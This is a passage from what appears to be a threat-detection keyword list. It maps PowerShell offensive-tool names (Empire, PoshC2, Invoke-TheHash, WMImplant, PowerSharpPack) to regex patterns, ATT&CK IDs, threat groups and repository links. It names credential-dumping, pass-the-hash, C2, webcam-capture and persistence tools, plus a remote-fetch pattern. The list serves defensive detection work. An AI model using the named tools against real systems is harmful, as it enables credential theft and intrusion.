"*Invoke-Vnc*",".{0,1000}Invoke\-Vnc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Vnc.ps1*",".{0,1000}Invoke\-Vnc\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-VNCServer.ps1*",".{0,1000}Invoke\-VNCServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VNCViewer.ps1*",".{0,1000}Invoke\-VNCViewer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is 
a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VoiceTroll.ps1*",".{0,1000}Invoke\-VoiceTroll\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Vulmap*",".{0,1000}Invoke\-Vulmap.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-VulnerableADCSTemplates*",".{0,1000}Invoke\-VulnerableADCSTemplates.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-watson*",".{0,1000}Invoke\-watson.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. 
Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","8","713","134","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z" "*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-WCMDump.ps1*",".{0,1000}Invoke\-WCMDump\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Invoke-WDigest.ps1*",".{0,1000}Invoke\-WDigest\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-WebCamAvi.ps1*",".{0,1000}Invoke\-WebCamAvi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-WebRequest https://tinyurl.com/*",".{0,1000}Invoke\-WebRequest\shttps\:\/\/tinyurl\.com\/.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*Invoke-WebRev.ps1*",".{0,1000}Invoke\-WebRev\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Whisker*",".{0,1000}Invoke\-Whisker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-WindowsEnum*",".{0,1000}Invoke\-WindowsEnum.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1082 - T1087 - T1057 - T1518 - T1016","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-WindowsUpdateCheck*",".{0,1000}Invoke\-WindowsUpdateCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-WinEnum*",".{0,1000}Invoke\-WinEnum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WinEnum.ps1*",".{0,1000}Invoke\-WinEnum\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-winrmsession*",".{0,1000}invoke\-winrmsession.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WireTap*",".{0,1000}Invoke\-WireTap.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-WlanProfilesCheck*",".{0,1000}Invoke\-WlanProfilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-WmicDriveBy.*",".{0,1000}Invoke\-WmicDriveBy\..{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1059.001 - T1021.002 - T1566.002","TA0002 - TA0009 - TA0043","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-WmiCommand *",".{0,1000}Invoke\-WmiCommand\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-WmiCommand*",".{0,1000}Invoke\-WmiCommand.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Invoke-WMIExec *",".{0,1000}Invoke\-WMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*invoke-wmiexec *",".{0,1000}invoke\-wmiexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 
"*Invoke-WMIExec.ps1*",".{0,1000}Invoke\-WMIExec\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*invoke-wmijspayload*",".{0,1000}invoke\-wmijspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WMILM*",".{0,1000}Invoke\-WMILM.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-WMILM.json*",".{0,1000}Invoke\-WMILM\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote 
Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-WMImplant*",".{0,1000}Invoke\-WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-WMIObfuscatedPSCommand*",".{0,1000}Invoke\-WMIObfuscatedPSCommand.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*invoke-wmipayload*",".{0,1000}invoke\-wmipayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WMIpersist*",".{0,1000}Invoke\-WMIpersist.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z" "*Invoke-WMIpersist.ps1*",".{0,1000}Invoke\-WMIpersist\.ps1.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","1","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z" "*Invoke-WMIRemoting*",".{0,1000}Invoke\-WMIRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in 
